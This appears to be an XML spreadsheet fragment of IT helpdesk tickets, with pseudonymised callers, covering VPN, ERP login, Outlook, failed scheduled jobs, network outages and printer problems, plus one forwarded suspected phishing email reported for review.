  <r>
    <s v="connecting to wireless outside of company of usa wireless"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zxobmreq.udikorhv@gmail.com_x000d__x000a__x000d__x000a_attachment is the only connections available when i need wireless.  please review and figure out why other wireless are not available._x000d__x000a__x000d__x000a_was at company usa, and also hotel.  no access available._x000d__x000a_"/>
    <s v="zxobmreq udikorhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_866808"/>
    <s v="ticket update on inplant_866808"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to collaboration_platform link"/>
    <s v="access to collaboration_platform link_x000d__x000a__x000d__x000a_"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="adding shared mailbox to outlook."/>
    <s v="_x000a_summary:the files for my 2 shared mailbox dierppeared from the left side of my screen"/>
    <s v="gduilrqe oxrivnwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="housekeep core files in HostName_1290. "/>
    <s v="could you please check feasibility to add additional space in HostName_1290 /dev/gpfsfs1_x000d__x000a__x000d__x000a_justification : bw reports are failing due to space issue in the mentioned mount point."/>
    <s v="ontswhiv arzepumv"/>
    <x v="46"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):  SID_37_x000a__x000a_enter user id of user having the issue: keshyslsj45_x000a__x000a_transaction code(s) the user needs or was working with: SID_37_x000a__x000a_describe the issue: forgot password to SID_37_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="ioafmupg gnmqfrve"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="unzfykar osxmbhav"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm add in is missing"/>
    <s v="crm add in is missing"/>
    <s v="ghurjpex dwyuzxht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2653 failed in job_scheduler at: 10/05/2016 11:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2653 failed in job_scheduler at: 10/05/2016 11:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="17"/>
  </r>
  <r>
    <s v="knocked off vpn"/>
    <s v="vpn was disconnected during an incoming call.  "/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype audio not working"/>
    <s v="skype audio not working"/>
    <s v="gcaktshf kpgfrotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm dynamics ; outlook issue "/>
    <s v="ms crm dynamics ; outlook issue "/>
    <s v="zxlhkpfi zylaghei"/>
    <x v="0"/>
  </r>
  <r>
    <s v="appears that pos file processing is not working - apps devt maint &amp; ebus"/>
    <s v="it appears that the pos files being submitted by our channel partners are not processing.  please see the attached log.  it appears that the last time a file was processed was on monday, october 3."/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="20"/>
  </r>
  <r>
    <s v="unable to access any of the bobj explorer reports"/>
    <s v="i'm unable to access any of the bobj explorer reports. i'm getting ps 50301 &amp; ps 50004 errors. please look into it."/>
    <s v="froajhdb ijetmkuc"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_1348a failed in job_scheduler at: 10/05/2016 11:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348a failed in job_scheduler at: 10/05/2016 11:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="as soon as i do select financial_toolscal years or financial_toolcal months the company overall value get &quot;no data found&quot;"/>
    <s v="contact # : 499119735568_x000d__x000a_summary:bex does not show any results as soon as i limit time periods. sind approx 20 mins. is there again a gneral bex issue at the moment?_x000d__x000a_ i need to create reporting to my upper management and get no sales infomation out. as soon as i do select financial_toolscal years or financial_toolcal months the company overall value get &quot;no data found&quot;_x000d__x000a_ i have re-staerted bex several times na_x000d__x000a_ and even rebooted my pc_x000d__x000a__x000d__x000a_ note : issue is urgent as i have to finally review data tomorrow morning my time with upper management and need to pull a bunch of sales data!!_x000d__x000a__x000d__x000a_checked with another colleague too...appears to have same issue..._x000d__x000a__x000d__x000a_"/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_2653 failed in job_scheduler at: 10/05/2016 10:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2653 failed in job_scheduler at: 10/05/2016 10:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_1315 failed in job_scheduler at: 10/05/2016 10:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1315 failed in job_scheduler at: 10/05/2016 10:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="probleme mit pf3 port 13"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ughzilfm.cfibdamq@gmail.com_x000d__x000a__x000d__x000a_hallo ,_x000d__x000a__x000d__x000a_port fÃ¼r ewew8323846  pf 3 port 13 liefert keine richtige ip ._x000d__x000a_bitte prÃ¼fen ._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_1394 failed in job_scheduler at: 10/05/2016 10:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1394 failed in job_scheduler at: 10/05/2016 10:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to connect to outlook from home network "/>
    <s v="unable to connect to outlook from home network "/>
    <s v="ghurjpex dwyuzxht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system disk c: of server HostName_698 is full again "/>
    <s v="_x000d__x000a__x000d__x000a_received from: fbyusmxz.kxvmcbly@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_system disk c: of server HostName_698 is full again â€“ please check._x000d__x000a_we had the same issue 5 weeks ago (ticket inc1543749) and 2 weeks ago (ticket inc1551508)._x000d__x000a_please identify and solve the cause of the problem and not only the impact again and again !_x000d__x000a_it is the virtual center server._x000d__x000a_"/>
    <s v="fbyusmxz kxvmcbly"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="bxgiwfhp hyixrzaw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer issue delivery notes, windows: on printer prtgt4203&lt;gt03&gt; and prtgt4208&lt;gt08&gt;."/>
    <s v="printer issue delivery notes, windows: on printer prtgt4203 and prtgt4208_x000d__x000a_contact # :12319292139_x000d__x000a_error message : install driver, access is denied while printing windows and erp."/>
    <s v="kblpmanr yxqilvua"/>
    <x v="2"/>
  </r>
  <r>
    <s v="the report none of the lookup/sort features are available to me."/>
    <s v="i have access to the report and reporting_tool now, however when i go into the report none of the lookup/sort features are available to me. there are 4 fields in the upper right corner that should allow me to manipulate the report, however they don't show as available. they just show blankâ€¦here is a screen shotâ€¦_x000d__x000a__x000d__x000a_please refer the attachment "/>
    <s v="wszbxlpu dsujiozp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="urgent help required- outlook to crm mfg_tooltion issue."/>
    <s v="contact "/>
    <s v="gonflcmq wmptisvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket follow up on inplant_866530"/>
    <s v="_x000a_summary:i have an open incident request #inco446530 with rakthyesh. can we resolve this here?"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bwhrchgr failed in job_scheduler at: 10/05/2016 10:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrchgr failed in job_scheduler at: 10/05/2016 10:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="townhall meeting"/>
    <s v="we need nwfoucba dzbujamc (it germany/germany) for the preparation of our technology town hall meeting on october 17. the beginning of the meeting is at 10 o'clock._x000d__x000a_"/>
    <s v="fecbygrw esmwronu"/>
    <x v="28"/>
  </r>
  <r>
    <s v="unable to access to bobj reports "/>
    <s v="unable to access to bobj reports "/>
    <s v="vupmctne ylnsweao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: vpn router (rtr01) is down at 9:15 am et on 10/05, site is up on rtro2  "/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________ 9:15 am et on 10/05, ______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____na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____na____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _______na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x v="7"/>
  </r>
  <r>
    <s v="email settings issue "/>
    <s v="_x000a_summary:i hit the wrong button and messed up my e-mail format. to delete anything i have to go into the home button and delete from there."/>
    <s v="gduilrqe oxrivnwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user called to speak with nicdhylas hidhys...asked user to send an email as on skype he is not available."/>
    <s v="user called to speak with nicdhylas hidhys...asked user to send an email as on skype he is not available."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="tfzlohik esibqtvy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="static noise : interaction id : 1064732743"/>
    <s v="static noise : interaction id : 1064732743"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer name"/>
    <s v="_x000d__x000a__x000d__x000a_received from: koahsriq.wdugqatr@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_we need a new computer name._x000d__x000a_service tag is: ddwjm72_x000d__x000a_"/>
    <s v="koahsriq wdugqatr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="dpajkrhy hwvjympt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="names issues with engineering_tool system"/>
    <s v="_x000a__x000a_received from: vkezwolt.fgnqzeai@gmail.com_x000a__x000a_hello ,_x000a__x000a_feel very sorry to say, off late we are facing lots of issues with engineering_tool system._x000a__x000a_please note the below, names not appearing in ascending order of alphabets.  looking for particular names has become a nightmare._x000a__x000a_[cid:image002.jpg@01SID_35f29.49a49a10]_x000a__x000a_best "/>
    <s v="vkezwolt fgnqzeai"/>
    <x v="25"/>
  </r>
  <r>
    <s v="creating an inspection plan"/>
    <s v="i have been working on creating an inspection plan and it doesn't seem to be working. i created it but i am not able to view the batch number for this inspection plan in qa32. i tried to create an 89lot as well and it isn't working either (no valid inspection type for material 7417741 was found or selected) is the warning. can you please assist me with this? material is alloy 11 mm# 7417741 and it needs to ship today. contact phone number"/>
    <s v="riygevcb uzowmhaj"/>
    <x v="44"/>
  </r>
  <r>
    <s v="not able to make outbound calls from siemens phone system"/>
    <s v="not able to make outbound calls from siemens phone system"/>
    <s v="zmgsfner caltmgoe"/>
    <x v="36"/>
  </r>
  <r>
    <s v="wk38 -&gt; qdxyifhj zbwtunpy"/>
    <s v="halo ,_x000a_der drucker bereitet problem mit dem druck. bitte die einstellungen Ã¼berprÃ¼fen. danke. uwe"/>
    <s v="qmwhlnev ixtmkwdc"/>
    <x v="32"/>
  </r>
  <r>
    <s v="authorisation"/>
    <s v="_x000a__x000a_received from: bqjvxsaf.aupdonjy@gmail.com_x000a__x000a_pl. provide z_pm_supervisor role to user haajksjp plant plant_107 system SID_34_x000a__x000a__x000a_sent from my iphone_x000a__x000a__x000a_"/>
    <s v="bqjvxsaf aupdonjy"/>
    <x v="19"/>
  </r>
  <r>
    <s v="network outage: site engineering_toolkuznetsk, russia is down since 6:41 am et on 10/05"/>
    <s v="what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______________ 6:41 am et on 10/05________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _______na    (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _________na__   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na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x v="7"/>
  </r>
  <r>
    <s v="probleme mit vpn \weszfyok fbadnjhu"/>
    <s v="probleme mit vpn \weszfyok fbadnjhu"/>
    <s v="weszfyok fbadnjhu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit portal \franjuz urbghty"/>
    <s v="probleme mit portal \franjuz urbghty"/>
    <s v="petljhxi bocxgins"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset for bowtniuy.afgdmesz@gmail.com"/>
    <s v="erp SID_34 account unlock and password reset for bowtniuy.afgdmesz@gmail.com"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="russia: interface: vlan1 Â· russia engineering_tool wharehouse lan on company-eu-rus-engineering_toolkuznetsk-dmvpn-891-rtr01.company.com is down"/>
    <s v="russia:  interface: vlan1 Â· russia engineering_tool wharehouse lan on company-eu-rus-engineering_toolkuznetsk-dmvpn-891-rtr01.company.com is down"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1142 failed in job_scheduler at: 10/05/2016 06:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1142 failed in job_scheduler at: 10/05/2016 06:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="problem in outlook client database synchronizing "/>
    <s v="problem in outlook client database synchronizing "/>
    <s v="enhjdypo rsbxiepn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="microsoft outlook issue"/>
    <s v="hi team,_x000d__x000a__x000d__x000a_i am unable to get mails intermittently during these time i need to update the folder to get the mails, sometimes it does not work like that too. can you please look into this issue. "/>
    <s v="wczegmok bgqoclvs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="upgrade to office 2016"/>
    <s v="currently there are two versions of office on my computer installed - office 2013 in the 64 bit folder and office 2013 in the 32 bit folder._x000d__x000a_pls delete the old 2013 and repair the new one."/>
    <s v="zmnhfcbv azdnkmul"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp intercompany inwarehouse_tool issue sto - 4908197080"/>
    <s v="from: batia ben-shloosh _x000a_sent: wednesday, september 28, 2016 8:06 pm_x000a_to:huji uhytry; rujteoza mcoswhjuanthila; yayuel sayatgr_x000a_cc: hkfipags sdilxrfk; rzucjgvp ioqjgmah; jhdythua htayhil; udmbwocs kegsjdva_x000a_subject: re: mm6599468 - d.n. 9169446361_x000a__x000a_hello ,_x000a__x000a_please find the lauacyltoe hxgaycze sto - 5019208191._x000a__x000a_please be informed that the same currency problem has occurred on a new shipment under the above d.n._x000a_for 8 pcs mm6599468 under d.n. 9169446361  the inwarehouse_tool 0811166205 show the total amount of us$ 71.80.15.0712, the real value which show on the sto number 5019286181  is 126.61$ for each._x000a__x000a_please check the issue urgently,   the shipment is currently hold in our warehouse._x000a__x000a__x000a_please see the below correspondence on the previous shipment from june 2016._x000a__x000a_"/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="9"/>
  </r>
  <r>
    <s v="login is not possible ??"/>
    <s v="_x000a__x000a_received from: lgeuniqf.ijsnyxgf@gmail.com_x000a__x000a_hallo kollegen,_x000a__x000a_bitte mal prÃ¼fen, warum der kollege diehm diese frage gestellt bekommt auf nein klickt &amp; sich dann nicht einloggen kann?_x000a__x000a_dank &amp; gruÃŸ_x000a__x000a__x000a_[cid:hardcopy-cid]_x000a_"/>
    <s v="lgeuniqf ijsnyxgf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp user id &amp; password not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ploxzuts.utvimnwo@gmail.com_x000d__x000a__x000d__x000a_dear sir/madam,_x000d__x000a__x000d__x000a_pl do the needful regarding the subject matheywter (message shown is wrong user id &amp; password )_x000d__x000a__x000d__x000a_fyi &amp; na_x000d__x000a__x000d__x000a_warm "/>
    <s v="ploxzuts utvimnwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="could not logon to erp via vpn"/>
    <s v="error message in both systems SID_34 / SID_1:_x000d__x000a__x000d__x000a_partner 62.157.140.133:3200 not reached. error no 10061: connection refused"/>
    <s v="skocrqdw pexcdfao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/05/2016 04:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/05/2016 04:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="please create dn from plant_105 to plant_212 on 1 pc of mm3954300"/>
    <s v="we can not create please create dn from plant_105 to plant_212 on 1 pc of mm4065411? urgent  - shipping point dns1."/>
    <s v="ylitqvaj ljxdfhus"/>
    <x v="5"/>
  </r>
  <r>
    <s v="lean certificates not getting sent automatically"/>
    <s v="hi khadfhty,_x000a__x000a_today, i created another lean event but still the certificates are not sent automatically to the recipient's. i can see the certificates in the certificate list section. also, co-facilitator 2 name is not appearing in the certificate. same happened for the past event too._x000a__x000a_request you to kindly fix this issue on priority._x000a_"/>
    <s v="fohvgnkd stfmcapj"/>
    <x v="15"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="dpajkrhy hwvjympt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit alicona nach update \jionmpsf wnkpzcmv"/>
    <s v="probleme mit alicona nach update \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup we_wu73 \jionmpsf wnkpzcmv"/>
    <s v="setup we_wu73 \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="chg1145744 - stop the reminders "/>
    <s v="_x000d__x000a__x000d__x000a_received from: atdclmyi.wqxzaysu@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_i have received ten mails so far on approval of the above ticket . sample mail attached . pl take immediate steps to stop these reminders as i have already approved the ticket._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="atdclmyi wqxzaysu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password"/>
    <s v="_x000a__x000a_received from: uijxpazn.gvtzlphs@gmail.com_x000a__x000a_dear all,_x000a__x000a_could you please reset password for dpajkrhy hwvjympt (websty12) immediately and let me know._x000a__x000a__x000a_best "/>
    <s v="uijxpazn gvtzlphs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1351 failed in job_scheduler at: 10/05/2016 02:34:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1351 failed in job_scheduler at: 10/05/2016 02:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="issue with engineering_tooled software"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ntuhoafg.bzwefjvk@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to see option for creating new customer &amp; new dealer names in the engineering tool software, please help me to resolve the issue._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35eff.5e2f2f10]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="25"/>
  </r>
  <r>
    <s v="probleme beim zugriff auf zeichnungen - netweaver business clint"/>
    <s v="_x000a__x000a_received from: ecoljnvt.lbdqmvfs@gmail.com_x000a__x000a_sehr geehrte kollegen,_x000a__x000a_ich kann den netweaver business clint nicht Ã¶ffnen._x000a__x000a_wenn ich auf die entsprechende app drÃ¼cke (Ã¼ber vpn bereits verbunden), dann kommt folgender hinweis:_x000a__x000a_[cid:image001.png@01SID_35ee0.18647971]_x000a__x000a_bitte um ihre unterstÃ¼tzung_x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="ecoljnvt lbdqmvfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2049 failed in job_scheduler at: 10/05/2016 02:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2049 failed in job_scheduler at: 10/05/2016 02:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="outlook &amp; crm not getting sync"/>
    <s v="outlook &amp; crm not getting sync"/>
    <s v="dijxefrq nbgykjpr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="zvenmiap kocjpnle"/>
    <x v="0"/>
  </r>
  <r>
    <s v="seek support_network related issue."/>
    <s v="_x000d__x000a__x000d__x000a_received from: utoegyqx.lhosidqg@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to access erp and other files through network._x000d__x000a_i am facing this problem from past 3 weeks on daily basis , the issues are  addressed to local it team and getting it resolved on case to case basis._x000d__x000a_it is causing lot of disturbance ._x000d__x000a__x000d__x000a_seek suppor to resolve the issue._x000d__x000a__x000d__x000a_below is the error message when i tried to log in for SID_34._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35ef9.a78c5e90]_x000d__x000a__x000d__x000a_and each day when i connect to network i am connected to companyguest network, i need to change it to companysecure. after this also i am facing problems._x000d__x000a__x000d__x000a_"/>
    <s v="utoegyqx lhosidqg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_1384 failed in job_scheduler at: 10/05/2016 01:42:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1384 failed in job_scheduler at: 10/05/2016 01:42:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="interface: fastethernet0/2 Â· timeclock on clhr_toollant(41.10.34.08611 ) is down since 8:35pm on 10/04/16"/>
    <s v="interface: fastethernet0/2 Â· timeclock on clhr_toollant(41.10.34.08611 ) is down since 8:35pm on 10/04/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1346 failed in job_scheduler at: 10/05/2016 01:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1346 failed in job_scheduler at: 10/05/2016 01:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1391 failed in job_scheduler at: 10/05/2016 01:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1391 failed in job_scheduler at: 10/05/2016 01:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="can't access erp by vpn"/>
    <s v="_x000a__x000a_received from: ovhtgsxd.dcqhnrmy@gmail.com_x000a__x000a_it help,_x000a__x000a_i can't login erp SID_34 from home by vpn with error message below,  can you help?_x000a__x000a__x000a_[cid:image001.png@01SID_35f0c.dcfb21c0]_x000a__x000a__x000a_juhu jojfufn_x000a_ap logistics manager_x000a_e: ovhtgsxd.dcqhnrmy@gmail.com&lt;mailto:ovhtgsxd.dcqhnrmy@gmail.com&gt;_x000a_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
    <s v="ovhtgsxd dcqhnrmy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ey consultant is unable to login to citrix. attached the error screenshot."/>
    <s v="ey consultant is unable to login to citrix. attached the error screenshot._x000d__x000a_kindly do the needful."/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to login to engineering tool "/>
    <s v="unable to login to engineering tool "/>
    <s v="rzikhjae tzekbfjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2573 failed in job_scheduler at: 10/05/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2573 failed in job_scheduler at: 10/05/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to login to engineering tool "/>
    <s v="unable to login to engineering tool "/>
    <s v="bslwfqcv xqaheoim"/>
    <x v="0"/>
  </r>
  <r>
    <s v="australia, australia is currently experiencing very long loading times for erp. "/>
    <s v="name:elituyt_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:byhtu_47@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:australia, australia is currently experiencing very long loading times for erp. can you please look into this?"/>
    <s v="uisewznr ewtmkphs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp "/>
    <s v="_x000d__x000a__x000d__x000a_received from: duoyrpvi.wgjpviul@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_my erp is running incredibly slow and it tries to load pages and then kicks me out with the below._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35f0a.5f8ac670]_x000d__x000a__x000d__x000a_kind, "/>
    <s v="nehxmtpg xepltzqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp very slow - happens every night starting at 9:45 pm"/>
    <s v="name:fyzceglp vfnraqxc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:fyzceglp.vfnraqxc@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:erp very slow - happens every night starting at 9:45 pm"/>
    <s v="fyzceglp vfnraqxc"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_3052 failed in job_scheduler at: 10/04/2016 22:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3052 failed in job_scheduler at: 10/04/2016 22:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="vip-processed payment - potentional security attempt"/>
    <s v="from: xmjwanes astmvqhc _x000a_sent: wednesday, october 05, 2016 12:14 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: rakthyesh fw: processed payment - potentional security attempt_x000a__x000a_do not open.......see the attached received earlier today.    _x000a__x000a_marc_x000a__x000a_xmjwanes astmvqhc_x000a_director, human resources_x000a_xmjwanes.astmvqhc@gmail.com_x000a__x000a__x000a_-----original message-----_x000a_from: ghyaniel@dealgce.com [mailto:ghyaniel@dealgce.com] _x000a_sent: tuesday, october 04, 2016 12:56 pm_x000a_to: xmjwanes astmvqhc; naffwflie.hyhtard@kronsnwdg.com; agthynew@kw.com_x000a_subject: processed payment_x000a__x000a_i made a list with the items i need and can find on company.com do you offer discounts for bulk orders?_x000a_you can find my contact details and the item list attached._x000a__x000a_"/>
    <s v="xmjwanes astmvqhc"/>
    <x v="26"/>
  </r>
  <r>
    <s v="window locked for user id - laijuttryhr"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wyxqkzmf.urigtqnp@gmail.com_x000d__x000a__x000d__x000a_hi help desk team_x000d__x000a__x000d__x000a_my window id locked.  please assist to unlock immediately.  "/>
    <s v="wyxqkzmf urigtqnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_866566"/>
    <s v="ticket update on inplant_866566"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 10/04/2016 19:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 10/04/2016 19:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ticket update on inplant_866142"/>
    <s v="ticket update on inplant_866142"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_866570"/>
    <s v="ticket update on inplant_866570"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2573 failed in job_scheduler at: 10/04/2016 18:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2573 failed in job_scheduler at: 10/04/2016 18:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="43"/>
  </r>
  <r>
    <s v="missing owtlmpuv oicrjsfh in my team calendar page "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_i am missing one person from my gl2 team on the calendar page_x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a__x000a_"/>
